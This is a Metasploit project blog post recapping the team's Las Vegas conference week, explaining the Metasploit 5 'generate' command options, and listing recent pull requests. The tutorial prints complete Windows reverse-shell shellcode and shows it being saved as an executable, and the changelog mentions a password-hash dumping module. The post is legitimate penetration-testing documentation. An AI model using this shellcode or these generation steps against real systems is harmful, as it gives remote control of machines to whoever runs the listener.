Hacker Summer Camp
Last week, the Metasploit team flew out to sunny, hot, and dry Las Vegas for Hacker Summer Camp (Black Hat, BSidesLV, and DEF CON). It was a full week of epic hacks, good conversation, and even a little business!
If you managed to catch us at our Open Source Office Hours (previously
OSSM, the Open Source Security Meetup) in Bally's, we just wanted to say
thanks for making the trek through the Las Vegas sun to come see us!
In between Vegas and the Exploit That Shall Not Be Named, we've been
steadily at work enhancing modules, the console, and fixing bugs for
msfvenom in my
Back in June of last year, we aligned the options for
generate command with
msfvenom's options. Since the change was
subtle and may not have been picked up by the various tutorials on the
Net, this will be a quick recap on how to use the new-ish options.
If you're on Metasploit 5, please continue reading! If not, you can
continue to use the old invocation. :-)
help generate to see the new usage for the
msf5 payload(windows/shell_reverse_tcp) > help generate Usage: generate [options] Generates a payload. Datastore options may be supplied after normal options. Example: generate -f python LHOST=127.0.0.1 OPTIONS: -E Force encoding -O <opt> Deprecated: alias for the '-o' option -P <opt> Total desired payload size, auto-produce appropriate NOP sled length -S <opt> The new section name to use when generating (large) Windows binaries -b <opt> The list of characters to avoid example: '\x00\xff' -e <opt> The encoder to use -f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war -h Show this message -i <opt> The number of times to encode the payload -k Preserve the template behavior and inject the payload as a new thread -n <opt> Prepend a nopsled of [length] size on to the payload -o <opt> The output file name (otherwise stdout) -p <opt> The platform of the payload -x <opt> Specify a custom executable file to use as a template msf5 payload(windows/shell_reverse_tcp) >
Following the example in the usage, to specify datastore options in your
generate command, simply append them to the command line after normal
msf5 payload(windows/shell_reverse_tcp) > generate -f python LHOST=127.0.0.1 # windows/shell_reverse_tcp - 324 bytes # https://metasploit.com/ # VERBOSE=true, LHOST=127.0.0.1, LPORT=4444, # ReverseAllowProxy=false, ReverseListenerThreaded=false, # StagerRetryCount=10, StagerRetryWait=5, # PrependMigrate=false, EXITFUNC=process, CreateSession=true buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68" buf += "\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" buf += "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" buf += "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" buf += "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" buf += "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" buf += "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" buf += "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" buf += "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" buf += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" msf5 payload(windows/shell_reverse_tcp) >
What's even cooler is that
generate will remember the datastore
options you gave it, allowing you to invoke it again with different
options, such as writing the payload to a file.
Here we demo writing the payload
windows/shell_reverse_tcp to file
shell_reverse_tcp.exe without having to set
msf5 payload(windows/shell_reverse_tcp) > options Module options (payload/windows/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 127.0.0.1 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port msf5 payload(windows/shell_reverse_tcp) > generate -f exe-only -o shell_reverse_tcp.exe [*] Writing 73802 bytes to shell_reverse_tcp.exe... msf5 payload(windows/shell_reverse_tcp) > file shell_reverse_tcp.exe [*] exec: file shell_reverse_tcp.exe shell_reverse_tcp.exe: PE32 executable (GUI) Intel 80386, for MS Windows msf5 payload(windows/shell_reverse_tcp) >
We hope you find these changes useful. Happy hacking!
Enhancements and features
- PR #12161 - The
linux/gather/hashdumpmodule has been updated to gather password history information from
- PR #12202 - This adds the
needs_cleanupattribute to post modules, fixing a crash when the attribute is used (such as in
FileDropper) without being available.
- PR #12199 - This replaces a backtrace with a friendly error message when the user specifies an invalid value for
RHOSTSin an exploit module.
- PR #12198 - This restores functionality from Metasploit 4 and earlier where payload-specific options to the generate command can be passed with
-o. For parity with the
msfvenomcommand however, prefer simply specifying options directly with Metasploit 5 and later.
- PR #12188 - This fixes
tools/modules/module_author.rbto use the renamed
As always, you can update to the latest Metasploit Framework with
msfupdate and you can get more details on the changes since the last blog post from GitHub:
We recently announced the release of Metasploit 5. You can get it by cloning the Metasploit Framework repo (master branch). To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial editions).